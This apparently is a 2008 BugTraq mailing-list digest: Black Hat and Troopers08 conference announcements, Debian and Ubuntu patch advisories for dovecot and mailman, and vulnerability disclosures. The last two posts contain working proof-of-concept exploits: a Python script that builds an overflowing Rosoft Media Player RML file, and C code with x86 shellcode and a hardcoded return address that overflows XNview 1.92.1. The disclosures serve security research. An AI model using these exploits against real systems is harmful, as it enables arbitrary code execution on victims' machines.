Black Hat Announcements: New CFP system and Japan '08 confirmed
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 BugTraq readers, here is a big Black Hat update to keep inquiring minds up to date with all the goings on in our not-so-secret lair: Black Hat Amsterdam is a go! Training: 25-26 March 2008 Briefings: 27-28 March 2008 There will be four different tracks over two days comprised of over 20+ internationally renowned security professionals speaking on diverse topics from intercepting GSM traffic and the evolution of spam techniques to attacking Anti Virus products and new client side channels: https://www.blackhat.com/html/bh-europe-08/bh-eu-08-main.html Black Hat USA News: We're very proud to announce a new feature for paid Black Hat attendees starting with the USA show in August - delegate access to our CFP system! Paid delegates can now log into our CFP database, read and review our proposed presentations and share their ratings and comments with Black Hat. Your ratings will help us create the show you want to attend, and even help focus presentations as they're being created. We are excited to see what kind of information we learn about what interests our delegates and what kind of talks meet their needs best. We've always said that our delegates make Black hat the experience it is, and we're glad to have the opportunity to extend their influence on the final product. To read more about this new opportunity, go to: https://www.blackhat.com/html/blackpages/blackpages.html We're also unveiling an Un-Track where attendees create their own mash-up style presentations - so if you've got something to share with the security community, this is your moment. Continuing a popular new BH development, we will also have speaker QA rooms after every presentation to help you follow up with your speaker and network with likeminded delegates. Still have a question that didn't quite get answered? Follow your speaker and continue the conversation. Registration is now OPEN for The Black Hat Briefings USA, register now to take advantage of our early bird rates: Black Hat Briefings USA 2008, August 2-7 at the Caesars Palace Las Vegas Early registration rate closes May 1, 2008. Regular registration rate closes July 1, 2008. https://www.blackhat.com/html/bh-registration/bh-registration.html#USA The Black Hat USA Call for Papers is now open. For descriptions of the tracks and deadlines check out: https://www.blackhat.com/html/bh-usa-08/bh-usa-08-cfp.html To create or update a submission: https://cfp.blackhat.com/ Download all the Black Hat USA 2007 content for free in an iPod friendly format! For audio and video follow these links: https://www.blackhat.com/podcast/bh-usa-07-video.rss https://www.blackhat.com/podcast/bh-usa-07-audio.rss Black Hat Japan News: We're happy to announce that Black Hat is returning to Tokyo for another Black Hat Japan in October 2008. We'll be bringing another strong lineup of speakers and trainers and the best lineup of technical security presentations available in Japan. We hope to see you there! About Black Hat The Black Hat Briefings are a series of highly technical information security conferences that bring together thought leaders from all facets of the infosec world - from the corporate and government sectors to academic and even underground researchers. The environment is strictly vendor-neutral and focused on the sharing of practical insights and timely, actionable knowledge. Black Hat remains the best and biggest event of its kind, unique in its ability to define tomorrow's information security landscape. 15 years at the intersection of network security and hacker ingenuity is what makes Black Hat the one-of-a-kind conference it is, one where the establishment and the underground are equally at home. In addition to the large number of short, topical presentations in the Briefings, Black Hat also provides hands-on, high-intensity, multi-day Trainings. The Training sessions are provided by some of the most respected experts in the world and many also provide formal certifications to qualifying attendees. Arrangements can also be made to bring Black Hat's trainers to your location for private and customized training. Subscribe to the Black Hat RSS feed to keep up to date on news, announcements, and content: https://www.blackhat.com/BlackHatRSS.xml UNSUBSCRIBE: These announcements get sent to past Black Hat attendees. If you wish to stop receiving them just reply saying so and I'll remove you from the list. Jeff Moss Director Black Hat -BEGIN PGP SIGNATURE- Version: PGP Desktop 9.7.0 (Build 1012) Charset: us-ascii wsBVAwUBR9saXUqsDNqTZ/G1AQjHRAf+Kzu1JM+3uJfDYb4lnTzog1lPcT9bmKhI Odwbpae5ISCKoJq3LQ20COwPdnEappUSvZPwO8KCfAxtub6eeHDIsKc03AoordGb T+4V3KFJ2Bp+/lKNySA5X3SX+87VpTgo9kycmHSW6XmsIj+q1UKdHAtxXDhKYOnS aulcInOm9adjU/Zexzq04om+ojOAEVwnbpPykaqYtEg05Lmn2Rgznm9O1wPOMYyG blbnU5kWdEjDpeyHDRQlSw3YrtNYfREM0ElT8oztWyxLIqNK+qqMKuARXC8Tqyin 7qaX3U41qfZq6TNlAGzVPzBA6afd39WffWIDXrvUZ8oJ1FvuaHRE1g== =tDr8 -END PGP
Local persistent DoS in Windows XP SP2 Taskmgr
Dear list, after weeks of total ignorance by Microsoft I decided to finally release all information related to a bug, that has to do with the Windows XP SP2 Taskmanager. Manipulating a Registry key makes it possible to disable the Taskmgr. On the next startup it will crash with an error message. It is possible to backup the key and repair the Registry doing so, but the attack scenario is clear: A virus uses this code, the user can't open the Taskmgr anymore and your process is somehow hidden. The full information about this bug, can be found here: http://core-security.net/archive/2008/march/index.php#14032008 And the exploit is available here: http://core-security.net/releases/exploits/taskmgr_dos.c.txt Greets, SkyOut --- core-security.net ---
[SECURITY] [DSA 1516-1] New dovecot packages fix privilege escalation
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA-1516-1[EMAIL PROTECTED] http://www.debian.org/security/ Florian Weimer March 14, 2008 http://www.debian.org/security/faq - -- Package: dovecot Vulnerability : privilege escalation Problem type : local Debian-specific: no CVE Id(s) : CVE-2008-1199 CVE-2008-1218 Debian Bug : 469457 Prior to this update, the default configuration for Dovecot used by Debian runs the server daemons with group mail privileges. This means that users with write access to their mail directory by other means (for example, through an SSH login) could read mailboxes owned by other users for which they do not have direct write access (CVE-2008-1199). In addition, an internal interpretation conflict in password handling has been addressed proactively, even though it is not known to be exploitable (CVE-2008-1218). Note that applying this update requires manual action: The configuration setting mail_extra_groups = mail has been replaced with mail_privileged_group = mail. The update will show a configuration file conflict in /etc/dovecot/dovecot.conf. It is recommended that you keep the currently installed configuration file, and change the affected line. For your reference, the sample configuration (without your local changes) will have been written to /etc/dovecot/dovecot.conf.dpkg-new. If your current configuration uses mail_extra_groups with a value different from mail, you may have to resort to the mail_access_groups configuration directive. For the stable distribution (etch), these problems have been fixed in version 1.0.rc15-2etch4. For the unstable distribution (sid), these problems have been fixed in version 1.0.13-1. For the old stable distribution (sarge), no updates are provided. We recommend that you consider upgrading to the stable distribution. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/d/dovecot/dovecot_1.0.rc15-2etch4.dsc Size/MD5 checksum: 1300 8146ccf246ed64e1ac8c0127489ec798 http://security.debian.org/pool/updates/main/d/dovecot/dovecot_1.0.rc15.orig.tar.gz Size/MD5 checksum: 1463069 26f3d2b075856b1b1d180146363819e6 http://security.debian.org/pool/updates/main/d/dovecot/dovecot_1.0.rc15-2etch4.diff.gz Size/MD5 checksum: 102991 21959fc45cf0f8932fa9eb890791ff39 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_alpha.deb Size/MD5 checksum: 583482 a0d18885da096140ceb4110d525569d4 http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_alpha.deb Size/MD5 checksum: 1379844 6103bce830848d3f9bb4347f5c9b94f0 http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_alpha.deb Size/MD5 checksum: 621320 48127903af1fe2130cb84c57e5a607ff amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_amd64.deb Size/MD5 checksum: 1222430 1c2e1ffeb6bf745ed88cde01c62d264a http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_amd64.deb Size/MD5 checksum: 536634 4f64ed0cc16510e9c3d709342b3c57ca http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_amd64.deb Size/MD5 checksum: 569588 c17bac715f188f55ae20e5a3c95109b1 arm architecture (ARM) http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_arm.deb Size/MD5 checksum: 1123030 47eb9fddcc68c2c213afa10c8e3d8747 http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_arm.deb Size/MD5 checksum: 506134 0f4d939f2cf68f4e5b01140c846e50bc http://security.debian.org/pool/updates/main/d/dovecot/dovecot-imapd_1.0.rc15-2etch4_arm.deb Size/MD5 checksum: 537564 82310ae4e42406429f8ade7cbb81abf0 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/d/dovecot/dovecot-common_1.0.rc15-2etch4_hppa.deb Size/MD5 checksum: 1298818 603d12284115b6349e1d0334263d2af0 http://security.debian.org/pool/updates/main/d/dovecot/dovecot-pop3d_1.0.rc15-2etch4_hppa.deb Size/MD5 checksum: 562192 413ac964849698428c1b08e9cc9075bc
Troopers08 Security Conference, April 23/24 (Munich/Germany)
Troopers08 Presentations Keynote on Invulnerable Software - Dan Bernstein KIDS - Kernel Intrusion Detection System - Rodrigo Branco State of Security - Andrew Cushman, Microsoft Release of the next revision of the free Exploit-Me series of application penetration testing tools - Nish Bhalla, Security Compass Side Channel Analysis - Job de Haas, Riscure Hackertools according to German law (? 202c StGB) - Horst Speichert, Lawyer Hardening Oracle in Corporate Environments - Alexander Kornbrust, Red-Database-Security Virtualization: There is no spoon - Michael Kemp Straight Talk about Cryptography - Jon Callas, PGP Evilgrade: You have pending upgrades - Francisco Amato Self defending networks - hype or essential need for international organisations? - Rolf Strehle, VOITH AG Keynote Virtualization: Floor Wax, Dessert Topping and The End of Information Security As We Know It? - Christopher Hoff, Unisys GPUs, password recovery and thunder tables - Andrey Belenko, ElcomSoft Incident Management - tasks and organization. - Volker Kozok, German Ministry of Defense A penetration testing learning kit - Ariel Waissbein, Core Security Organizing and analyzing logdata with entropy - Sergey Bratus, Dartmouth College Hacking Second Life(TM) - Michael Thumann, ERNW GmbH Enterprise Webapplication Security [EMAIL PROTECTED] S.E., Dr. Johannes Raab Thomas Stocker, Allianz S.E. Tapping $$$ Enterprises - Pierre Kroma Virtual Honey Pots - Thorsten Holz, Universitaet Mannheim SCADA and National Critical Infrastructures: is security an optional? - Raoul Chiesa Data Loss Protection - Hope or Hype. - Enno Rey Angus Blitter -- Additional Pre-Con Latenight Talks PacketWars Evening Fun thanks, -- Enno Rey ERNW GmbH - Breslauer Str. 28 - 69124 Heidelberg - www.ernw.de Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 173 6745902 PGP FP 055F B3F3 FE9D 71DD C0D5 444E C611 033E 3296 1CC1 Handelsregister Heidelberg: HRB 7135 Geschaeftsfuehrer: Roland Fiege, Enno Rey
[USN-586-1] mailman vulnerability
=== Ubuntu Security Notice USN-586-1 March 15, 2008 mailman vulnerability CVE-2008-0564 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 6.10 Ubuntu 7.04 Ubuntu 7.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: mailman 2.1.5-9ubuntu4.2 Ubuntu 6.10: mailman 1:2.1.8-2ubuntu2.1 Ubuntu 7.04: mailman 1:2.1.9-4ubuntu1.2 Ubuntu 7.10: mailman 1:2.1.9-8ubuntu0.2 In general, a standard system upgrade is sufficient to effect the necessary changes. NOTE: Due to an internal release testing mistake, earlier published mailman versions 1:2.1.9-4ubuntu1.1 (for Ubuntu 7.04) and 1:2.1.9-8ubuntu0.1 (for Ubuntu 7.10) accidentally included an incorrect patch and caused a regression, as reported in https://launchpad.net/bugs/202332 This update includes fixes for the problem. We apologize for the inconvenience. Details follow: Multiple cross-site scripting flaws were discovered in mailman. A malicious list administrator could exploit this to execute arbitrary JavaScript, potentially stealing user credentials. Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5-9ubuntu4.2.diff.gz Size/MD5: 231090 d3e7124adf9454e2754e41c98df1a79c http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5-9ubuntu4.2.dsc Size/MD5: 626 0ac6344f31b1fd756ff3c724a059c907 http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5.orig.tar.gz Size/MD5: 5745912 f5f56f04747cd4aff67427e7a45631af amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5-9ubuntu4.2_amd64.deb Size/MD5: 6613254 72d9727b248c5e8ac1ffe6699989b546 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5-9ubuntu4.2_i386.deb Size/MD5: 6612872 6fa80a2c5f9fb4ef86fc37f5948eb7ea powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5-9ubuntu4.2_powerpc.deb Size/MD5: 6621726 45ad75a62c903f80ccaed21d8bff8e0f sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.5-9ubuntu4.2_sparc.deb Size/MD5: 6620818 7dc3bc18e981e78fa7d9e18bda151ecc Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.8-2ubuntu2.1.diff.gz Size/MD5: 203009 ee4a019ea676c82f040bad51a13f2a04 http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.8-2ubuntu2.1.dsc Size/MD5: 819 53355a3ca08c288d785123da51dbb10e http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.8.orig.tar.gz Size/MD5: 6856039 b9308ea3ffe8dd447458338408d46bd6 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.8-2ubuntu2.1_amd64.deb Size/MD5: 8017888 34628b56f38515676c840c10f2aa100d i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.8-2ubuntu2.1_i386.deb Size/MD5: 8016276 18b60f0774f2f664d5505391834ed0c6 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.8-2ubuntu2.1_powerpc.deb Size/MD5: 8025122 20b2783ab25dd270751211463fdedc77 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.8-2ubuntu2.1_sparc.deb Size/MD5: 8023672 02dd507266718e196abef08311a995b5 Updated packages for Ubuntu 7.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.9-4ubuntu1.2.diff.gz Size/MD5: 142531 2e32aeebcbf3d45e498d4241bf1cf0c8 http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.9-4ubuntu1.2.dsc Size/MD5: 981 0c8c78087bcf0213f17013c94fea9764 http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.9.orig.tar.gz Size/MD5: 7829201 dd51472470f9eafb04f64da372444835 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.9-4ubuntu1.2_amd64.deb Size/MD5: 8606862 74502c6c9e9a8bb277c6f741abd46541 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/m/mailman/mailman_2.1.9-4ubuntu1.2_i386.deb Size/MD5: 8605384 46330ecad45d07957ac827e5f8e944e2 powerpc architecture (Apple
Rosoft Media Player 4.1.8 RML Stack Based Buffer Overflow
Description: This is nothing special - there is just flaw in Rosoft Media Player 4.1.8, similar to one discovered by Juan Pablo Lopez Yacubian. This one concerns RML file. This is Stack Based Buffer Overflow vulerability - we can ovewrite EIP. I hope that it was not reported before. Author: Wiktor Sieroci#324;ski POC: #!/usr/bin/python content = ( #EXTINF:Played=0\n + A * 5000 + \n ) fd = open(music.rml,w); fd.write(content) fd.close(); print RML FILE CREATED
XNview 1.92.1 Long Filename Overflow
*XNview* Informations : ** Version : 1.92.1 Website : http://www.xnview.com/ Problem : Long Filename Overflow Description: XnView is an efficient multimedia viewer, browser, and converter. It supports more than 400 graphic file formats (PNG, JPEG, TARGA, TIFF, GIF, BMP, and more). Details : * The problem is that XNview doesn't handle long file names.It result in an exploitable buffer overflow which allow execution of arbitrary code. POC: #include windows.h #include unistd.h /* Shellcode Size=164 octets Action: open calc.exe */ unsigned char shellcode[] = \x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x16 \x77\x0b\x94\x83\xeb\xfc\xe2\xf4\xea\x9f\x4f\x94\x16\x77\x80\xd1 \x2a\xfc\x77\x91\x6e\x76\xe4\x1f\x59\x6f\x80\xcb\x36\x76\xe0\xdd \x9d\x43\x80\x95\xf8\x46\xcb\x0d\xba\xf3\xcb\xe0\x11\xb6\xc1\x99 \x17\xb5\xe0\x60\x2d\x23\x2f\x90\x63\x92\x80\xcb\x32\x76\xe0\xf2 \x9d\x7b\x40\x1f\x49\x6b\x0a\x7f\x9d\x6b\x80\x95\xfd\xfe\x57\xb0 \x12\xb4\x3a\x54\x72\xfc\x4b\xa4\x93\xb7\x73\x98\x9d\x37\x07\x1f \x66\x6b\xa6\x1f\x7e\x7f\xe0\x9d\x9d\xf7\xbb\x94\x16\x77\x80\xfc \x2a\x28\x3a\x62\x76\x21\x82\x6c\x95\xb7\x70\xc4\x7e\x87\x81\x90 \x49\x1f\x93\x6a\x9c\x79\x5c\x6b\xf1\x14\x6a\xf8\x75\x59\x6e\xec \x73\x77\x0b\x94; /* user32.dll ret adress == jmp ebp under Win XP pro SP2 */ unsigned char ret[] =\x34\x59\x40\x7e; int main(int argc,char *argv[]){ char *bufExe[3]; char buf[511]; bufExe[0] = xnview.exe; bufExe[2] = NULL; memset(buf,0x90,511); memcpy(buf[260],ret,4); memcpy(buf[330],shellcode,sizeof(shellcode)); bufExe[1] = buf; execve(bufExe[0],bufExe,NULL); return 0x0; } Disclosure Timeline: 04 February 2008 - Discovery 12 February 2008 - Vendor notification 13 February 2008 - Vendor reply 14 March2008 - Release of XNview 1.93.1 15 March2008 - Public Disclosure Credits: Author : Sylvain THUAL Original advisory(French) : http://www.click-internet.fr/index.php?cki=Newsnews=9 E-mail : [EMAIL PROTECTED] Website : http://www.click-internet.fr